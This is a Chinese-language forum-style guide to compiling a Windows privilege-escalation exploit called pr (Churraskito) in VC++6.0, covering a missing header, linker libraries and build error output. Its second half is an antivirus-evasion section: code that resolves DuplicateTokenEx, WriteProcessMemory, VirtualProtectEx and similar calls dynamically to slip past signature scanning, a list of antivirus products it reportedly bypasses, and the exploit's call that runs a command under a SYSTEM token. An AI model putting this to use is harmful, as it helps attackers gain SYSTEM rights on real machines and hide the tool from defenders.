这里源码是暗组上面提供的KOOPie写的pr
这些利用工具源码都是vs 2003,编译的环境和vc不太一样,因此,在编译的时候会出现这样那样的问题
下面我们就以vc++6.0来编译pr。
环境:vc++6.0
缺少的文件:sshwbemhelpers.h(2003服务器特有的),所以需要我们到网上下载 覆盖到 X:\program files\microsoft visual studio\vc98\include\sshwbemhelpers.h
e:\teamprogram\visualc++6.0\pr\churraskito\stdafx.h(10) : fatal error C1083: Cannot open include file: 'SshWbemHelpers.h': No such file or directory stdafx.cpp
e:\teamprogram\visualc++6.0\pr\churraskito\stdafx.h(10) : fatal error C1083: Cannot open include file: 'SshWbemHelpers.h': No such file or directory
执行 cl.exe 时出错.
工程设置:
Project Settings -->Links-->对象/库模块后面添加以下几个类库,否则会出现下面几种错误
psapi.lib wsock32.lib Ws2_32.lib,xolehlp.lib
d:\program files\microsoft visual studio\vc98\include\sshwbemhelpers.h(23) : warning C4068: unknown pragma
d:\program files\microsoft visual studio\vc98\include\sshwbemhelpers.h(769) : warning C4068: unknown pragma
stdafx.cpp
Linking...
Churraskito.obj : error LNK2001: unresolved external symbol _GetModuleBaseNameA@16
Churraskito.obj : error LNK2001: unresolved external symbol _EnumProcessModules@16
Churraskito.obj : error LNK2001: unresolved external symbol __imp__connect@12
Churraskito.obj : error LNK2001: unresolved external symbol __imp__inet_addr@4
Churraskito.obj : error LNK2001: unresolved external symbol __imp__htons@4
Churraskito.obj : error LNK2001: unresolved external symbol __imp__bind@12
Churraskito.obj : error LNK2001: unresolved external symbol __imp__WSASocketA@24
Churraskito.obj : error LNK2001: unresolved external symbol __imp__WSAStartup@8
Debug/Churraskito.exe : fatal error LNK1120: 8 unresolved externals
*******************************************免杀**********************************************
nod32:
LookupAccountSid
DuplicateTokenEx
typedef WINADVAPI BOOL (WINAPI *LookupAccountSidAT)
(
__in_opt LPCSTR lpSystemName,
__in PSID Sid,
__out_ecount_part_opt(*cchName, *cchName + 1) LPSTR Name,
__inout LPDWORD cchName,
__out_ecount_part_opt(*cchReferencedDomainName, *cchReferencedDomainName + 1) LPSTR ReferencedDomainName, __inout LPDWORD cchReferencedDomainName,
__out PSID_NAME_USE peUse
);
LookupAccountSidAT pLookupAccountSidA = (LookupAccountSidAT)GetProcAddress(LoadLibrary("ADVAPI32.dll"),"LookupAccountSidA");
typedef WINADVAPI BOOL (WINAPI *DuplicateTokenExT)
(
__in HANDLE hExistingToken,
__in DWORD dwDesiredAccess,
__in_opt LPSECURITY_ATTRIBUTES lpTokenAttributes,
__in SECURITY_IMPERSONATION_LEVEL ImpersonationLevel,
__in TOKEN_TYPE TokenType,
__deref_out PHANDLE phNewToken
);
DuplicateTokenExT pDuplicateTokenEx = (DuplicateTokenExT)GetProcAddress(LoadLibrary("ADVAPI32.dll"),"DuplicateTokenEx");
kaspersky:过
Avira AntiVir :过
mcafee: 过
AVG: 过
symantec企业版:过
Norton AntiVirus:过
360全套:过
金山毒霸全套:
typedef WINBASEAPI BOOL (WINAPI *VirtualProtectExT)
(
__in HANDLE hProcess,
__in LPVOID lpAddress,
__in SIZE_T dwSize,
__in DWORD flNewProtect,
__out PDWORD lpflOldProtect
);
VirtualProtectExT pVirtualProtectEx = (VirtualProtectExT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"VirtualProtectEx");
typedef WINBASEAPI BOOL (WINAPI *WriteProcessMemoryT)
(
__in HANDLE hProcess,
__in LPVOID lpBaseAddress,
__in_bcount(nSize) LPCVOID lpBuffer,
__in SIZE_T nSize,
__out_opt SIZE_T * lpNumberOfBytesWritten
);
WriteProcessMemoryT pWriteProcessMemory = (WriteProcessMemoryT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"WriteProcessMemory");
typedef WINADVAPI BOOL (WINAPI *GetTokenInformationT)
(
__in HANDLE TokenHandle,
__in TOKEN_INFORMATION_CLASS TokenInformationClass,
__out_bcount_part_opt(TokenInformationLength, *ReturnLength) LPVOID TokenInformation,
__in DWORD TokenInformationLength,
__out_opt PDWORD ReturnLength
);
GetTokenInformationT pGetTokenInformation = (GetTokenInformationT)GetProcAddress(LoadLibrary("ADVAPI32.dll"),"GetTokenInformation");
金山主动防御能过,金山杀毒扫描能出来,但是执行不提示,杀下面的两个自定义函数 :
DelRegistrySubkeys和(RunCommandAsSystem
DelRegistrySubkeys();
printf ("/xxoo/-->Running command with SYSTEM Token...\n");
if (RunCommandAsSystem(hTokenOut, lpCommand))
{
printf ("/xxoo/-->Done, command should have ran as SYSTEM!\n");
return 0;
}